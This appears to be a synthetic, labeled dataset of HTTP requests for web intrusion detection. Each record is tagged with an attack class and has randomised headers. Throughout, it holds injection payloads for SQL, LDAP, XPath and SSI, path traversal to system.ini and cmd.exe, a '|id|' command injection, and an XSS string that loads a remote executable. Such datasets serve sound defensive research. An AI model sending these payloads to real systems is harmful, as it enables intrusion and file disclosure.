If-Match: *
If-None-Match: *
If-Range: Fri, 08 Feb 08 02:27:49 GMT
Max-Forwards: 8305
MIME-Version: 3.2
Pragma: ov07eii='aehosrn'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: 9eaE gSbget=kxneH
Range: 447-,158917-
Referer: http://www.zdcr.com/uonrdn/noeeaUi/szUSh6ci/iyemc.tiff
TE: trailers,trailers
Trailer: If-Range
User-Agent: til3i/6.6.5
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8726x4401
Via: 1.8 100.234.172.22, 0.1 130.177.53.180
Transfer-Encoding: deflate
Upgrade: hhO/0.0, tqa0d/3.1
Warning: 459 www.duAsdn.jpeg "nz6rni" "Thu, 23 Dec 04 09:07:50 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38541
Start - Id: 37969
class: LdapInjection
GET /uL0/32ra8BieHs6ht/iKNZZ8ERx5/rlceiDxa/b9QtF/NfVTDSH1D.htm?en=%29++%28++%7C++++%28++++cn%3D*o+%27brien*+++%29%28mail+%3D*o++++%27brien*+%29++&iuee7shlnkr=eh%3Eidps6d%3Dh HTTP/1.1
Host: 145.43.71.208:80
Connection: 8cgao
Accept: */*;q=0.9
Accept-Charset: us-ascii
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=23531
Client-ip: 163.204.117.84
Cookie: ifeealea7nnR=stylee
Cookie2: $Version="4"
Date: Wed, 25 Jun 08 05:39:20 GMT
ETag: W/"m8U-8_DHn2I9DXQ96"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 01 May 08 22:33:41 UTC
If-Unmodified-Since: Thu, 26 Jun 08 16:16:04 CET
If-Match: "S5oSgYbyA8T8uQ7t.Md"
If-None-Match: *
If-Range: Sun, 05 Aug 07 22:06:21 CET
Max-Forwards: 6
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: im4o0 xt8ceo3a=mTmhl
Range: -8,482604-
Referer: /re9csmdm/6Hhe/irne/nBfe.png
TE: gzip,deflate;q=0.1
Trailer: Warning
User-Agent: Hlcaettnoo5eew0z
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 4.3 125.101.210.132
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37969
Start - Id: 49985
class: XPathInjection
GET /vc.rQ@qtI7mO/nAAnq9onsshahian1h/yAmdhoi4tenrnz5e/aRiEEhbee/nmairzlyim4tTohrg/htJ8qQ@V9u/dfbetweenAnobject5a0Dq-cB/nison5ersntd5ieieGm.php4?CfWE5A5=02911&rseta2oo1ulr=t2seip6ouoeln4ne&tutsN0winthffne=7q4chMolgt&OAeldNtii=dBJJ5lTOLi&riaamevta=teHHlcat&ireeeNn=bS1kPRK6jE&aIitcf=s4O%27+++or+++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++i+%2B+++j%2B++k++++%2B++++l+++%2B+1%29%5D++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27lt0aod%27++++%3D+++%27+Mq%27+++++or&isiaeaZnU=07166137 HTTP/1.0
Host: www.eaei2Z.org
Connection: ersceeHr
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: So4et-mnsrj;q=0.1, dt-eheus, i0svnyui-bonhng;q=0.3, lg-e;q=0.5, taery1g-0tEstsx
Cache-Control: no-store
Client-ip: 237.62.233.210
Cookie: g3SyiScayA=rC-LQtSPqrAX;Muqarpwh5iLsc=yojjm;_positionEpGJV4=iylreplace;a1se=orCas_fs5Z3C;mif=Eiiito0dpa
Cookie2: $Version="9"
Date: Wed, 31 Oct 07 08:50:25 CET
Expect: 100-continue
If-Match: "J1aFHMN7HsDT-72_STaK"
If-None-Match: "YGnIskyPOjZxJx@rQ1"
Max-Forwards: 6562
Authorization: ft6t atoa=ertns
Referer: http://mtt3.be/h5pmes8/wdoryesu/rhLrci.css
TE: trailers
User-Agent: Mozilla/0.7 (compatible; MSIE 7.1; Linux i586; ddarToIrh; gr8Stm7543; eDyer9)
UA-Pixels: 0803x6416
Via: 6.9 www.dpcE.jpg:7368
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49985
Start - Id: 35809
class: XPathInjection
GET /i9dmiL2kCw_4T4B/d9ltmi8ulrgeAdn/Lelenayn/7WR1KQ/ji8koqnmlutOh3/5N7Ib_3/aGKViV6yL95PBWn/3itro/copy.Betc-hQcat9Jt/jec_PV/wa5igot/n5orxYRbW.tiff?bh7leFetjnitilR=btcIaCe%27++++or+++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i+%2B++++j++%2B++++k++++%2B+l+++%2B+1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++++%27embra1o%27++%3D++%27+ep%27+++or&derntbsrgh=yot-halet%2F%5C%2BFnh&FDwNn=oD_Fa HTTP/1.0
Host: 244.166.244.236
Connection: itUmrps9
Accept: video/mpeg, audio/x-wav
Accept-Charset: *
Accept-Encoding: compress;q=0.5, identity, deflate, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 25.4.155.47
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="52"
Date: Sat, 03 Jan 04 17:00:00 GMT
ETag: W/"dmUx2cdT1FwdnYkl"
Expect: ntmt9A
From: gH0ez@Sireoah.fr
If-Modified-Since: Sun, 02 May 10 10:38:04 GMT
If-Unmodified-Since: Thu, 03 Feb 05 01:44:25 CET
If-Match: "juhBjy0vAF6LU8iDRZ"
If-None-Match: "XJ7P-IofLZrNG9vGoss"
If-Range: Sat, 17 Jun 06 06:10:56 GMT
Max-Forwards: 7
MIME-Version: 1.7
Pragma: txP=lostFv
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest nc=007C8aF6
Range: 205-0247
Referer: /Rabiibo.nsf
TE: deflate;q=0.1
Trailer: If-None-Match
User-Agent: 9oscsrdeNogiv3siesrz
UA-CPU: x86
UA-Disp: 861,959,8
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 0.7 97.3.176.16
Transfer-Encoding: compress
Upgrade: hljiT/5.4, axrst/8.8
Warning: 282 www.eOXt.htm "312bFgsaSoacoe" 
X-Forwarded-For: 43.11.206.228
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35809
Start - Id: 41428
class: SqlInjection
POST /aig/2zrgDqjPcelor/5ar/rimh/VytqwselectN/lQd2DAum5am/IHgO2etcilinkexecNOx0I/t7nctedlhaiTIod/biescybyseeliaM/nyeHoa.cfm? HTTP/1.0
Content-Length: 179
Content-Language: yrs,e2a,mtjner
Content-Encoding: compress
Content-Location: /utlec/ecisja2/sibjd/cSxTe/eoamr.wmn
Content-MD5: b1RlZW51d2R5cWdnOXlobQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 12:44:36 UTC
Last-Modified: Fri, 06 May 05 01:31:45 UTC
Host: 147.16.234.27
Connection: close
Accept: text/xml;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, deflate
Accept-Language: 7me-gh7soaas;q=0.9, jovcem-4e, hirdr-as, eet5v8c-ata0eo0n;q=0.3, a-eards;q=0.8
Cache-Control: no-store
Client-ip: 196.36.129.201
Cookie: u4AeaWlt=3aiadnaof;Anfc8SsToem=tkehuro;Nme9dhtOnrrl8nJ=:d6hnc zbvtdtdw;1rnusghmYnaTi=6180808;8Qp9RUfIUbetweenf=in;C1r5zand79mtb=+techo
Cookie2: $Version="458"
Date: Mon, 03 Nov 08 03:09:19 UTC
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: hbituu@nl5IshaU.be
If-Modified-Since: Sat, 25 Sep 04 10:48:35 UTC
If-Unmodified-Since: Thu, 30 Sep 04 01:13:41 UTC
If-Match: "5IybfPEmxv5zbuKfR71V"
If-None-Match: "Ymizpe0zlydu2WdGsD"
If-Range: *
Max-Forwards: 5
MIME-Version: 0.4
Pragma: rfnj9='q'
Proxy-Authorization: Digest qop=ymsaBhdy
Authorization: Digest response="81F678b71Cec7e540dBdF0573EaC9FC0"
Range: -86
Referer: /c7nnswjt/n04ebete/Bct9nuee/diSme.php
TE: trailers
Trailer: Date
User-Agent: Mozilla/4.6 (X11; U; Unix 8.8; tl-d2; rv:5.5.5) Gecko/51578696
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 738x118
Via: gen/6.5 145.215.31.105
Transfer-Encoding: deflate
Upgrade: rht/5.4
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

eu8haoarwnssrmr=OR  'shr'     IN (    '    '  )&0L.arnq-=fco3&oagohdiaorcoSte=t50ZAeim&UPcatqNZsVupdatedEV=pmspe(Alaittwindow.open&eierylthtwmhmm=omiotelnet&6m7gl=61

End - Id: 41428
Start - Id: 44732
class: PathTransversal
GET /d3pdADiGN5U_2i9TH/xnnfejnEeiys/as4w-CAGq/bn-47bWPhuG7wZuS/esiob6zciupenn9c/bgmOrb/caamaleisishljN/ri/yaOzhiaf3Uecqaxs/a_2zHDBCwf/hdrv3.shtml?wvprocessing-instructionxs=126&73BcZ1=416739908&cehojetum=tssejlesteodrppAj&oteaot=FeirStgnehwOu&Sida5eftEf=onph-&R8zis=.%2F..%2F.%2F..%2F.%2F..%2F.%2F..%2F HTTP/1.1
Host: 214.103.152.165
Connection: hrthelsb
Accept: text/plain;q=0.7, video/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=5726
Client-ip: 179.133.199.215
Cookie: to0AJ8frUrtdnl=iBKqWEDqy.0v
Cookie2: $Version="76"
Date: Fri, 28 Dec 07 05:03:35 CET
ETag: "cagFw8bM.KdYd@fBxbEm"
Expect: 100-continue
From: gi6k@oggsey.org
If-Modified-Since: Sat, 29 Dec 07 01:09:44 GMT
If-Unmodified-Since: Sat, 21 Jan 06 13:28:47 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 09 May 04 05:26:54 CET
Pragma: aodh8tp=gtgsarh
Authorization: agoxte eiinhrh=oipd
Range: 218-,38304-
Referer: http://Tsdtfa.gov/arsdeEn/TteldAie/i1inff/rpvn8cl.dll
Trailer: TE
User-Agent: u4bd (tb43qLV-HS; x6L50VGp)
UA-CPU: MIPS
Via: 0.6 www.zeo7uYao.shtml
Transfer-Encoding: identity
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44732
Start - Id: 43712
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 222.176.126.62
Connection: io2ec
Accept: application/x-tar, video/*, image/gif
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: a-Z;q=0.7
Cache-Control: no-transform
Client-ip: 183.153.88.199
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="684"
Date: Fri, 21 Mar 08 11:01:58 UTC
ETag: W/"iBbC@9sWtxRHx5im"
Expect: aarl
From: nnlogc@ewfasl3.ch
If-Modified-Since: Thu, 25 Sep 08 14:38:23 CET
If-Unmodified-Since: Tue, 19 Jul 05 09:48:27 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Feb 08 23:35:21 GMT
Max-Forwards: 064
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic c2VhaW46Ykh0U3A=
Authorization: Digest nonce
Range: 7008-71
Referer: /5kwbhEaz/tasOrte/ikn8pe/irpn.exe
TE: gzip
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 4.8; rO-2a; rv:4.2.2) Gecko/24638689
UA-CPU: 68000
UA-Disp: 210,8217,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5641x613
Via: 6.5 232.80.54.80, 4.3 www.todEeree.png
Transfer-Encoding: tnhrdi; orzia=njLOxln
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 342 www.haYt.jpeg "eunI" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43712
Start - Id: 40372
class: SSI
GET /hyeelzcEttb/access_logu78cOpQU/p6geg4snx4ta/ti2T/etteshd7sjaTcta/sr.php?er2one=odgifNrqxs&Mdn=mp&y4.mochafM1f=+wnw4+ss&psZwgetl=a7dx+lL+5hsfeW&naltN=n2hO4Z1YvZ4&trtd=70529&ltefs1=ea0DzRkb_.BM&arei3u=iiao%24rg&evrsulyewdhi=iux&erda=%5Dt%3DIusr+r%409i&L7estylehzE=su0C&edeisoOK8J2=PRhnlueoohc+&l0dtmpmd7=tekhea HTTP/1.1
Host: 48.149.128.33:80
Connection: trUnde
Accept: image/png;q=0.6, text/plain, video/*
Accept-Charset: *
Accept-Encoding: <!--   #include    virtual="c:\winnt\system.ini"-->
Accept-Language: <!--    #include     virtual="c:\winnt\system.ini" -->
Cache-Control: rIle9=ipMp
Cookie: oKoeihh8=2;Niayv9irsifo6n=eeWR4xN;Gelu.VRA.h06=sW4X9y@;8tAUdocumentftp1IIgex=w3iCY9Qbzzl;eFEtearageisdt=onklaimtoyiehvoO;ErD6iCoheHr=65081
Cookie2: $Version="674"
Date: Sun, 03 Sep 06 01:19:42 GMT
Expect: 100-continue
If-Unmodified-Since: Fri, 22 May 09 24:13:14 GMT
If-Match: "Fel7RSWj1dV.5Z_MPY"
If-Range: "A61wRl3XF0o95TBWK"
Max-Forwards: 3028
Pragma: no-cache
Proxy-Authorization: NTLM NTJweXRnc3llYWVhdG9vZ29lcmU5aGZYbHJyaHRnZWRuaG9jZWRjdGNPbmVUaXh3
Referer: /E2sotte/geni/zTsai.mpeg
User-Agent: tamVmkcl0 http://www.rQad.it
Transfer-Encoding: dlheia; ppee47o1=i2iil5y
Upgrade: h76n7w/5.8, owdZls/4.8

null

End - Id: 40372
Start - Id: 43620
class: OsCommanding
POST /ftw7GRF.htm? HTTP/1.0
Content-Length: 16
Content-Language: myxodpen
Content-Encoding: compress
Content-Location: /ct5no/tumi0/8iiadruo.wav
Content-MD5: b25OdEdlZXRuc3RoMVN5Zg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 May 08 22:13:20 UTC
Last-Modified: Fri, 24 Sep 04 16:43:36 CET
Host: www.alisbsbdc.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: etId6uy4-ycsood;q=0.5, SS1e-nwrjN;q=0.5, nvEen-ehhfOove, ye8owE-iagaeks;q=0.5
Cache-Control: no-transform
Client-ip: 219.37.209.142
Cookie: od=snph-s h|oii+uIi;damca1t= 4oleipMe;niSdm=9cdnwod;u3sa9reEEa=48;itt=efnnt;.Zhome3O=+
Cookie2: $Version="35"
Date: Fri, 01 Apr 05 12:21:39 UTC
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: MTefsoo
From: ihse@2d96a.de
If-Modified-Since: Wed, 15 Aug 07 17:37:49 UTC
If-Unmodified-Since: Mon, 22 Jun 09 20:30:05 GMT
If-Match: "W54rWGr9Qs_zLL8N8"
If-None-Match: "bS64XQ@FMM274TrH"
If-Range: "jSRi9ZOdP-471ix@z"
Max-Forwards: 65
MIME-Version: 8.8
Pragma: Goea='hl0u1y'
Proxy-Authorization: Basic Y2xzaWhoOnRlYXQ=
Authorization: NTLM QXJ0dGFjdG9vemFmbm5jcGdxcGFlc0g0dHRpbzcza2x0bTYzYQ==
Range: -038
Referer: /lnnmitoL.exe
TE: deflate;q=0.5
User-Agent: |id  |
UA-CPU: PowerPC
UA-Disp: 2173,331,32
UA-Pixels: 6552x5468
Via: FTP/2.6 www.baze.js, oEur/5.8 www.rzAn.html:04
Transfer-Encoding: baeh; eCEI7od=voi66c
Upgrade: ztui/9.8, e5en/4.5, osoee/7.9, inhqa/2.0, 7Mlsb/6.6
Warning: 741 www.tepgi.js:26 "evtcw2ce38n8H" "Wed, 16 Mar 05 22:27:07 GMT"
X-Forwarded-For: 88.15.93.4
X-Serial-Number: 92031179386365561798
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ysncs=4063672586

End - Id: 43620
Start - Id: 45945
class: PathTransversal
GET /i8J6v/tmelurxfzeIosnnnfgi/eerwsIoyIePe3oo/k0bc/u32wwUAxN3um-jDhkTZ/t3pnp/httpsGSDSV5Ewuv1/wyhuya/_Jo6rexecDJ.sh?tt=526304&atdTrno14e0aA=2738615&NgKo9-1mMIftp=8694&qIAYa8TUx-=+w&lni7i3=emEndenfidem&tsbecey=75&iehdkobhdji=ieniucoooa&dlOasDeudcmma7=etg%3Aoee%2Fe&hamyy88hrbt=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&ycodU=rsos%29ws&ctrsnwicit=99358008 HTTP/1.0
Host: 69.232.26.113:80
Connection: hle2n
Accept: application/*, audio/x-wav, text/xml
Accept-Charset: isiri-3342;q=0.4, iso-8859-1;q=0.9, isiri-3342;q=0.1, x-mac-cyrillic;q=0.0, x-mac-japanese;q=0.6
Accept-Encoding: 
Accept-Language: otehh-rdaH, seenrnv9-dia7a9y;q=0.6, toge-in0s;q=0.9, t-yios0;q=0.9
Cache-Control: max-age=75637
Client-ip: 81.34.102.44
Cookie: lyThsycaoua=achildeiQ3eval;lerree=56417288
Cookie2: $Version="94"
Date: Thu, 24 Nov 05 13:30:19 UTC
ETag: "HSlLUZs3qF9UWKYK"
Expect: teVee=arzTat2n;noepoete
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Sun, 15 Jan 06 24:41:05 CET
If-Unmodified-Since: Sat, 08 Jul 06 21:39:45 GMT
If-Match: "B@Z.uCN7BzHqczzisl"
If-None-Match: "8.XDWPTwApOF2QH4@E"
If-Range: "enIa8c8JzhHcd8-"
Max-Forwards: 11
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: /ttts/0wba/grti4dsm/sthdh/dlsteId.jpg
TE: trailers
Trailer: Accept
User-Agent: exspHmtdab (t79CF48xn; s-1jrF6Oh; rhDkNU; tryZ5psQ1w)
UA-CPU: PowerPC
UA-Disp: 3135,8994,8
UA-OS: Windows NT
Via: 8.5 www.ardtowa4.gif
Transfer-Encoding: gzip
Upgrade: Eih/5.7, olse/5.3, eieecn/0.8
Warning: 240 244.77.211.173 "osnMh" 
X-Forwarded-For: 226.91.8.34
X-Serial-Number: 15666151508879935432
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45945
Start - Id: 38160
class: LdapInjection
GET /tAf_h56kE2uG9xB@wyY/vyYwYC5YnVHht/s_jhe_kVGIeLFC/eSeN/ksheicQua5tla/4ohyeDcaltumsh/lrrEw/q6wnueanLeeenr/sRRvgJC3fNbzq6/tvP/mB.tiff?nej=752298716&exmlRstyle=dl%29%28+++%7C++++%28na%3D*%29&iiiNenE=3be0pue&yrrozesnaat=qblxT&etssefihsn3tc=oyRe&tereetqihi4peon=2wrOehzkb5%3F9&qsOttIeme3beea=dwnmiL&tjthclehas=9552&aarm7n=io&rnd8inFxrAhdi=101&li=Peecmdcaz%26include&aszi9GHieNis=8eie6uehenrssNff&eitgr6l=Sh7iirhmldahoIfsl&s7oEvb3ldive=7Lkq47GUws3c&la7yCpoctvut=z5o HTTP/1.0
Host: 196.15.62.226
Connection: close
Accept: audio/*, text/xml
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.6
Accept-Language: ssfi2uM-w8N, i6nh-mA6
Cache-Control: max-age=212
Client-ip: 253.14.42.39
Cookie: maaBe=0547;nl=863688965;eIeOcuehdetaged=e
Cookie2: $Version="6"
Date: Mon, 12 Jun 06 10:08:23 CET
ETag: W/"oYZOAXe-lop@UENF"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Sun, 04 Apr 10 11:00:57 CET
If-Unmodified-Since: Sun, 26 Nov 06 21:04:14 CET
If-Match: "1Ouy9-@oIfwoxEs"
If-None-Match: *
If-Range: Wed, 17 Feb 10 03:57:04 UTC
Max-Forwards: 1916
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: njtdo oiaHAsOe=InaIstei
Range: 4-,5139-9
Referer: /ueteuKas/qnaUDt.doc
TE: deflate
Trailer: Proxy-Authorization
User-Agent: csupsrh/4.1.6
UA-CPU: x86
UA-Disp: 311,524,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 550x1014
Via: FTP/3.2 34.153.216.22:7, 3.7 www.deacy7n.shtml, HTTP/0.7 243.34.7.179
Transfer-Encoding: sctr
Upgrade: eeu/8.8, fSe7/3.7, nho/6.1, rqw/6.3, SLsti/8.0
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38160
Start - Id: 35741
class: XPathInjection
GET /ims/dAyTqyF_kj9Tlkz5Ir/h_3e8HJAkLT5nbKOHz/ra0HwR/eq1TfWAs1WpBG/ui.I4sjmvjsp8/t6/dN8YxozUi7/tleoaoepl5e9/9aiws/qedutkyrotlyaOnjcbl.exe?ofoOo7ee6zsenxa=7ustgEe5btyelhi9aq&oeait=treiu&BXHM8sE=Ab&tNpina5pt9hiy=taszitnecer4se8&tzaibSarh=sb+aabPtAr&aoaeeuUFrdne=7706+or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+6906%3D&PCFsK@@Cg=fnwhereeiwget HTTP/1.0
Host: www.9evSeed.st:48973
Connection: scAH
Accept: application/*, image/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, identity;q=0.0, gzip
Accept-Language: *
Cache-Control: h1ftsoi='vsEas'
Client-ip: 15.64.70.130
Cookie: atZeSt=0
Cookie2: $Version="4"
Date: Fri, 30 Dec 05 04:33:58 GMT
ETag: "UQRCXM-rpuSyTChl2N"
Expect: 100-continue
From: 7mrzro1@lUne0jie.it
If-Modified-Since: Wed, 24 Jan 07 14:49:37 CET
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 5.0
Pragma: eild=oOcba
Proxy-Authorization: lbae ji6pSct=zng4myt
Authorization: Digest nonce
Range: 820401-
Referer: http://5ictnE.org/Oee3etE/eoiepylg/tNap8.rar
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/5.5 (Machintosh; U; PPC 5.2; ms-vu; rv:6.1.3) Gecko/34678495
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: HTTP/2.9 238.151.124.125:922, 5.1 186.4.76.150, oei1/2.5 167.218.76.220
Transfer-Encoding: erVai1; acTte7lz=n3ys
Upgrade: 7ln/1.2, hsmh/6.3, ueo/9.6, 4r6eM7/9.5
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 7969287836637200
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35741
Start - Id: 41413
class: SqlInjection
PUT /rsj/lmsienHovw/yYPLY9rU2HA/6I1u5rKHA.hB93j/rg/sBNRrueyK3uJE4.mspx? HTTP/1.0
Content-Length: 180
Content-Language: en
Content-Encoding: identity
Content-Location: http://tceIpN8o.fr/fd0ds/lamdNi/axcaDs9.swf
Content-MD5: c3R6RGl2b0F0bWFuMWhsZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Apr 07 15:20:43 UTC
Last-Modified: Sun, 26 Aug 07 10:15:41 UTC
Host: www.osruk7.uk
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-korean;q=0.8, cp-932;q=0.2
Accept-Encoding: identity, gzip, identity, deflate
Accept-Language: n-is6oia, gr-1ak1rc;q=0.7, saeurm2-Es5;q=0.6, mTckiHS-ntuil, o-oocIn;q=0.2
Cache-Control: no-cache
Client-ip: 199.178.94.59
Cookie: rm9djuteoeatt=nAnr3xc;iih65rwyttTy=7ttrr|;ewgr=79873673;utmoimixr6dC6ts=r 3x;gtrSlyg=axvJH;idEa7Ia5dsaek=1830638
Cookie2: $Version="59"
Date: Sun, 02 May 04 03:47:52 UTC
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: lmDa5=8ijgro;lbni3hs=iin2blna
From: cTensp@smyerSeiti.st
If-Modified-Since: Wed, 12 Nov 08 18:53:54 GMT
If-Unmodified-Since: Wed, 26 Apr 06 12:17:41 CET
If-Match: "d-pyYyZhtOUr6rzkfU9G"
If-None-Match: "MBHk0t2FfH@tbD-G"
If-Range: Tue, 08 Sep 09 05:55:04 GMT
Max-Forwards: 3
MIME-Version: 2.2
Pragma: la=nkeDl
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Basic ZWgybWxvUDoxb3ljb3RsZA==
Range: 24-
Referer: /eTeToa/aiten/Ihzles/jeragz/rncNetkb.asmx
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.4 (Machintosh; U; PPC Mac OS X 3.5; te-fo; rv:7.7.1) Gecko/97126660
UA-CPU: MIPS
UA-Disp: 0223,7526,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1178x5140
Via: 1.4 www.thuScr.css:9, 9.7 0.189.119.128
Transfer-Encoding: gzip
Upgrade: etntne/4.1, Iossd/8.2
Warning: 632 www.ittuqan.jpeg "eesSloe6b" "Mon, 16 Aug 04 21:53:38 UTC"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 19164
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mf=s&pbnxwtcrsi8kn=    OR     2  >     1&avuThaOio=630900&KyPhX70WsQM=079195&PcBz=hwinnt&edc exeshutdownwsghadiv&vhodforiw=56630&Aom5er=5s\&dExeumaNua=eE&sanrdr04sHbai=546040

End - Id: 41413
Start - Id: 47469
class: XSS
GET /YrTuogoSF/seEw0seCtaasd/GDyEII2EsVXa9/BhttpswN2GYVKE/sD/2ZY9ciV8EYd/stS-VPIHXn/tneaeL3pqcsEnitr29t.tiff?PI2@SaH@lC=1086&o7veeilraeOjtt=%3Cdiv+style++%3D+++%22binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.nd.com%2Fscript%2FNr.exe%5D%29%3B+++%22+%3E&XYhtacceshOA1RP9=+neajlsmte1n HTTP/1.0
Host: 243.227.29.7:80
Connection: Sroivqwa
Accept: audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 227.166.219.20
Cookie: qAnebshlvae0ue=t6Q2P
Cookie2: $Version="37"
Date: Thu, 10 Jun 04 06:15:25 GMT
ETag: "AGbD10fcZavK4XS"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Wed, 11 Oct 06 07:18:41 GMT
If-Unmodified-Since: Mon, 28 Apr 08 12:19:07 UTC
If-Match: "3eXoRSl5GT93ni8yWEPI"
If-None-Match: *
If-Range: Wed, 07 May 08 07:22:11 UTC
Max-Forwards: 20
MIME-Version: 8.7
Pragma: t1=pErxstk
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Digest algorithm=MD5-sess
Range: 307-,052-4971
Referer: http://www.l6sitmn.ch/eomenan/dessoEAi/e1er.htm
TE: trailers,trailers,gzip;q=0.0
Trailer: From
User-Agent: iBJ1J7iP http://www.kn5ieca.de
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4671x382
Via: 8.4 128.0.194.210
Transfer-Encoding: inr33
Upgrade: rshhh0/1.3
Warning: 434 www.stheqS.htm "2se9l4zCow3t" "Tue, 16 Nov 04 07:44:37 CET"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47469
Start - Id: 49286
class: XPathInjection
